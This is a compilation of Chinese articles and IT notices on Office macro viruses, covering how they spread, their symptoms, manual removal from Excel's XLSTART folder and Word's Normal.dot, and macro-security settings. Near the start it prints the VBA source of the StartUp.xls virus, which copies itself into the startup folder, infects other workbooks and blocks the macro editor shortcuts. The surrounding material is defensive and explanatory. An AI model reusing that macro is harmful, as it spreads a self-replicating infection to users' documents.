宏病毒查杀解决方案

宏病毒原理及防范一、常见宏病毒1．startup宏病毒宏病毒其实并不神秘，其工作原理是借用宏表4.0的auto_open事件启动病毒代码的复制和病毒文件的新建，新建的文件常放在xlsrt文件夹下。

然后利用xlstart文件夹文件可以自动启动的原理把病毒代码复制到新打开的excel文件中。

下面先看看startup宏病毒代码吧，注意红字部分。

Sub auto_open()On Error Resume NextIf ThisWorkbook.Path <> Application.StartupPath AndDir(Application.StartupPath & "\" & "StartUp.xls") = "" ThenApplication.ScreenUpdating = FalseThisWorkbook.Sheets("StartUp").CopyActiveWorkbook.SaveAs (Application.StartupPath & "\" & "StartUp.xls")n$ = ActiveWindow.Visible = FalseWorkbooks("StartUp.xls").SaveWorkbooks(n$).Close (False)End IfApplication.OnSheetActivate = "StartUp.xls!cop"Application.OnKey "%{F11}", "StartUp.xls!escape"Application.OnKey "%{F8}", "StartUp.xls!escape"End SubSub cop()On Error Resume NextIf ActiveWorkbook.Sheets(1).Name <> "StartUp" ThenApplication.ScreenUpdating = Falsen$ = Workbooks("StartUp.xls").Sheets("StartUp").Copybefore:=Worksheets(1)Sheets(n$).SelectEnd IfEnd Sub2．book1病毒book1病毒最明显的标志是打开excel时自动跳出一个book1空文件。

最近word文档感染宏病毒解决处理办法：
一、首先要清除掉word模版，Word模板路径在哪里呢？
1、在Windows XP系统中，“我的模板”所在文件夹目录为C:\Documents and
Settings\Administrator\Application Data\Microsoft\Templates；
2、而在Windows Vista或Windows7\windows10系统中，“我的模板”文件夹目录为
Users\Administrator\AppData\Roaming\Microsoft\Templates。

3、特别注意：word2003模版文件名是：normal.dot ，word2007\2010\2016等的
模版文件名是：normal.dotm
4、如果以上目录找不到可能是你电脑隐藏了目录，请在此设置处打开
二、其次是将电脑系统中360杀毒升级到最新版，再进行全盘杀毒。

亲们不要
用金山毒霸杀毒，这个软件不大管用。

如有侵权请联系告知删除，感谢你们的配合！。

StartUp.xls宏病毒清除方法及步骤
StartUp.xls宏病毒的现象：
1.打开excel文件时提示有宏
2.文件不能直接保存，只能另存
3.打开excel文件时，点击"窗口"->"取消隐藏"，会打开一个Startup.xls文件
StartUp.xls宏病毒清除方法及步骤：（excel宏病毒）
第一步：清除C:\Documents and Settings\administrator\Application
Data\Microsoft\Excel\XLSTART下的StartUp.xls；
（注意：其中有些事隐藏文件，你看不到，按照下面说的做就可以看到那些隐藏文件：打开我的电脑》》工具》》文件夹选项》》“隐藏受保护的操作系统文件（推荐）”前面的勾打掉》》选中“显示隐藏的文件、文件夹和驱动器”》》去掉“隐藏已知文件类型的扩展名”的勾。

）第二步：清除C:\Documents and Settings\administrator\Application
Data\Microsoft\Excel\的Excel11.exe(约236K)及Excel11.xlb等名字中带有Excel11的文件。

（删除后Excel程序会自动创建部分文件）
第三步：下载startup.xls并放入“C:\Documents and Settings\administrator\Application Data\Microsoft\Excel\XLSTART\”。

注：各大杀毒软件多数不能发现此病毒，仅有少数几款，如nod32可以发现，但清除时会直接删除文件，因此在发现此类病毒时，使用上述方法解决，或联系信息中心协助处理。

巧妙解决“宏病毒”作者：孙蓓来源：《电脑知识与技术·经验技巧》2009年第10期在病毒横行的今天,你可能会非常担心自己的Word文档是否感染了电脑病毒,特别是宏病毒。

下面笔者就向大家介绍几种常用的方法。

一、验证:通过保存类型,巧妙鉴别宏病毒如何检查Word是否感染了宏病毒?其实检查的方法很简单。

打开需要检查的文档,单击“文件”菜单栏,选择“另存为”命令,如果对话框中的保存类型固定为“文档模板”,则表示这个文件已经感染了宏病毒,需要用杀毒软件进行清理了,如图1。

当然,你直接用杀毒软件来扫描一下这个文档也未尝不可,毕竟现在不装杀毒软件的用户还是少数。

二、拒绝:设置文档为“只读”属性, 让病毒吃闭门羹因为宏病毒在Word中寄居的文件就是No rmal.dot,所以预防宏病毒的方法其实也很简单,只要把没有感染宏病毒的Normal.dot文件的属性设置为只读,这样宏病毒就不能寄居到Normal.dot中,就能起到预防宏病毒的效果了。

小提示:虽然把一些内容固定的文件设置为具有只读属性,是防止病毒侵入的方法之一,但这也不是万能的,如果病毒制造者注意到这一点,在侵入前先修改你的文件属性,去掉只读属性,那对他们来说也是小菜一碟。

三、查杀:彻底查杀,统统赶走宏病毒宏病毒是通过Word中的宏语言(一种类似VB的语言)编写的,易于传播而且危害巨大,常常能将你花了很多时间编写的文档瞬间“吃掉”,下面介绍使用手工的方法杀掉宏病毒。

单击“工具”菜单栏,选择“宏”,单击“宏”命令(或者使用组合键“Alt+F8”)调出宏对话框,如果在弹出的对话框中有已经记录的宏的话,那就极有可能是宏病毒,删除所有的宏就可以了。

比较复杂的宏病毒会将宏对话框屏蔽掉,这时就需要采用其他方法了。

Word环境中的宏病毒一般是存放在Microsoft Office目录下Templates子目录中的Normal.dot文件中,这时需要重新启动计算机,找到这个文件,并把它删除,再运行Word就可以了。

电脑宏病毒宏病毒是一种寄存在文档或模板的宏中的计算机病毒。

下面由店铺带你走进宏病毒中!让你充分的了解宏病毒!谢谢!宏病毒：一旦打开这样的文档，其中的宏就会被执行，于是宏病毒就会被激活，转移到计算机上，并驻留在Normal模板上。

从此以后，所有自动保存的文档都会“感染”上这种宏病毒，而且如果其他用户打开了感染病毒的文档，宏病毒又会转移到他的计算机上。

如果某个文档中包含了宏病毒，我们称此文档感染了宏病毒;如果WORD系统中的模板包含了宏病毒，我们称WORD系统感染了宏病毒。

来源虽然OFFICE97/Word97无法扫描软盘、硬盘或网络驱动器上的宏病毒。

但当打开一个含有可能携带病毒的宏的文档时，它能够显示宏警告信息。

并且在2013年后的杀毒软件已支持宏病毒扫描。

这样就可选择打开文档时是否要包含宏，如果希望文档包含要用到的宏(例如，单位所用的定货窗体)，打开文档时就包含宏。

如果您并不希望在文档中包含宏，或者不了解文档的确切来源。

例如，文档是作为电子邮件的附件收到的，或是来自网络或不安全的Internet节点。

在这种情况下，为了防止可能发生的病毒传染，打开文档过程中出现宏警告提示时最好选择“取消宏”。

OFFICE97软件包安装后，系统中包含有关于宏病毒防护的选项，其默认状态是允许“宏病毒保护”复选框。

如果愿意，您可以终止系统对文档宏病毒的检查。

当Word显示宏病毒警告信息时，清除“在打开带有宏或自定义内容的文档时提问”复选框。

或者关闭宏检查：单击“工具”菜单中的“选项”命令，再单击“常规”选项卡，然后清除“宏病毒保护”复选框。

不过我强烈建议您不要取消宏病毒防护功能，否则您会失去这道防护宏病毒的天然屏障。

上世纪90年代的宏病毒主要感染文件有word、Excel 的文档。

并且会驻留在Normal面板上据统计，通过Internet传播的不同类型的病毒数量如下：DOS型： 10000至11000种Windows型：12种Macintosh型：35种宏病毒： 200余种Unix型： 6种其中10000-11000种DOS型病毒能感染所有DOS、Windows95平台的计算机(但不感染Macintosh计算机);但200余种宏病毒中的大部分能感染所有计算机，包括PC机和Macintosh机。

预防和清除宏病毒的方法摘要：宏是WORD中避免一再的重复相同的动作而设计出来的一种工具，宏病毒就是利用软件所支持的宏命令编写的具有复制和传染能力的宏。

本文首先分析宏病毒的特性，并就如何检测、清除及预防进行了探讨。

关键词：宏病毒；WORD；预防；清除Abstract: The macro is a tool designed to avoid repeated the same action in the WORD, and a macro virus is the copy and infectious macro using the software to support macros written. This paper first analyzes the characteristics of macro virus, and discusses on how to detect, removal and prevent it.Key words: macro virus; WORD; prevention; clear所谓宏病毒，就是利用软件所支持的宏命令编写的具有复制和传染能力的宏。

宏病毒是一种新形态的计算机病毒，也是一种跨平台式计算机病毒。

1.宏病毒的工作原理在用W O R D 处理文档时，需要同时进行各种不同的动作，每一种动作其实都对应着特定的宏命令。

宏病毒的感染过程和破坏行为与WORD 的文件宏程序的操作密切相关，这些宏程序可能就是宏病毒的插入点。

病毒包含在宏中时，只要染毒的文件被打开，病毒的宏程序就可能会被执行，进而取得系统控制权，进行感染和破坏。

为了能广泛地传播，宏病毒大都采用感染通用模版NORMAL.DOT 的方法将自己复制到其他文档中去。

W O R D启动时总是自动打开通用模版，这就为宏病毒在每次启动WORD 时能够取得系统控制权提供了机会。

含有自动宏的染毒文档，当被其他计算机的WORD 打开时，也会自动感染该计算机。

宏病毒的基本知识王宇航09283020宏病毒一、宏病毒的基本知识宏病毒是一种寄存在文档或模板的宏中的计算机病毒。

一旦打开这样的文档，其中的宏就会被执行，于是宏病毒就会被激活，转移到计算机上，并驻留在Normal模板上。

从此以后，所有自动保存的文档都会“感染”上这种宏病毒，而且如果其他用户打开了感染病毒的文档，宏病毒又会转移到他的计算机上。

运行环境：microsoft office word特点：宏病毒是针对微软公司的字处理软件Word编写的一种病毒。

微软公司的字处理软件是最为流行的编辑软件，并且跨越了多种系统平台，宏病毒充分利用了这一点得到恣意传播。

宏病毒作为一种新型病毒有其特点与共性。

1．传播极快Word宏病毒通过.DOC文档及.DOT模板进行自我复制及传播，而计算机文档是交流最广的文件类型。

人们大多重视保护自己计算机的引导部分和可执行文件不被病毒感染宏病毒，而对外来的文档文件基本是直接浏览使用，这给Word宏病毒传播带来很多便利。

特别是Internet网络的普及，Email 的大量应用更为Word宏病毒传播铺平道路。

根据国外较保守的统计，宏病毒的感染率高达40%以上，即在现实生活中每发现100个病毒，其中就有40多个宏病毒，而国际上普通病毒种类已达12000多种。

2．制作、变种方便以往病毒是以二进制的计算机机器码形式出现，而宏病毒则是以人们容易阅读的源代码宏语言WordBasic形式出现，所以编写和修改宏病毒比以往病毒更容易。

世界上的宏病毒原型己有几十种，其变种与日俱增，追究其原因还是Word的开放性所致。

现在的Word 病毒都是用WordBasic语言所写成，大部分Word病毒宏并没有使用Word提供的Execute-Only处理函数处理，它们仍处于可打开阅读修改状态。

所有用户在Word工具的宏菜单中很方便就可以看到这种宏病毒的全部面目。

当然会有“不法之徒”利用掌握的Basic语句简单知识把其中病毒激活条件和破坏条件加以改变，立即就生产出了一种新的宏病毒，甚至比原病毒的危害更加严重。

宏病毒的名词解释宏病毒，即宏命令病毒，是一种针对办公软件和应用程序的恶意软件。

它利用了宏语言的功能，通过嵌入恶意代码来感染和破坏文件。

宏病毒的破坏性广泛存在于Word、Excel等办公软件中，曾经对计算机安全构成严重威胁。

一、宏病毒的传播方式宏病毒多以邮件附件的形式传播。

黑客通过电子邮件发送带有嵌入宏病毒的文档，一旦用户点击或打开，宏病毒就开始在用户计算机上执行恶意操作。

宏病毒还可以通过文件共享、网络下载和可移动存储介质等方式传播。

二、宏病毒的感染和破坏宏病毒主要感染和破坏办公文档文件，如Word、Excel、PowerPoint等。

它利用文档应用程序内置的宏语言功能，如VBA（Visual Basic for Applications），使恶意代码得以在打开文档的同时运行。

宏病毒可以操纵整个文档，执行恶意操作，如删除、篡改内容、复制自身并传播到其他文档。

宏病毒的破坏性可分为明显和隐蔽两种形式。

明显的病毒会立即显示出破坏行为，如删除文件、关闭程序等。

而隐蔽的病毒则更加隐蔽，它会在后台默默地进行操作，窃取用户信息、传播到其他文档或网络上。

三、预防宏病毒的措施为了保护计算机和个人信息的安全，我们需要采取一系列预防措施来防止宏病毒的感染和破坏。

1. 注意邮件和文件来源：不打开来自陌生人或不可信来源的邮件和文件，尤其是带有宏功能的文档。

2. 更新安全软件：定期更新防病毒软件和操作系统，以获取最新的病毒定义和安全补丁。

3. 禁用宏：对于非必要的宏功能，建议禁用或设置为仅在受信任的文件中启用。

4. 建立安全意识：提高员工对宏病毒的认知，教育他们不轻易点击或打开可疑附件，注意安全使用办公软件。

5. 备份重要文件：定期备份关键文件，以防止突发病毒感染或数据丢失。

四、应对宏病毒的解决方法如果不幸遭受宏病毒感染，我们需要及时采取相应的解决方法来处理病毒。

1. 断开网络连接：迅速断开计算机与网络的连接，以防止病毒通过网络传播和进一步破坏。

Office宏病毒防范操作说明宏病毒是一种寄存在文档或模板的宏中的普通病毒。

现个别电脑的Office文档已被感染了宏病毒，可能因启用Office的宏，或对宏安全性设置为“低”，从而导致Office容易感染宏病毒，或者访问过被感染宏病毒的文档也容易传播感染，为了防止宏病毒,建议禁用宏,这样就不会被感染。

如财务部某些报表需启用宏才可访问，处理完毕该报表后请对宏更改安全性设置为:“高”或“非常高”，以禁用宏命令，否则以后会容易感染宏病毒。

请大家参照以下步骤对宏安全性进行设置：1、打开Office2003的Excel报表，选择“工具”→“选项”，然后选择“安全性”，请选择上“√保存时从文件属性中删除个人信息”。

并单击“安全性”对话框中单击“高”按钮将安全级别设为高。

（以图红色部分）2、打开Office2007/2010的Excel报表，单击Office按钮→右下角“Word选项”→信用中心→信任中心设置→宏设置→禁用所有宏，并发出通知。

（以图红色部分）3、以上操作对宏禁用后可能导致某些报表无法打开，或者出现其它提示，可能该报表已被宏病毒损坏。

请对宏启用并打开此表，选择复制或（Ctrl+A）此表中全部内容，重新创建新Excel表并粘贴或（Ctrl+V），方可解决，如未能解决，请联系分机8303，需重新安装Office办公软件。

4、杀毒软件（最新版360、卡巴、金山等）都可以查杀，邮件附件中有Office 宏病毒专杀工具，请直接打开安装并全盘查杀，查杀完毕后请从“控制面板”中卸载“Office宏病毒专杀”。

5、为了共享平台上报表安全，平台上已查杀过病毒，但可能某此报表已被宏损坏难以修复，请各部门的负责员进行对自己负责的报表检查，如出现被宏损坏的报表请打开并复制重新创建报表并禁用宏。

请对加密报解密后进行查杀病毒（加密报表无法杀毒）。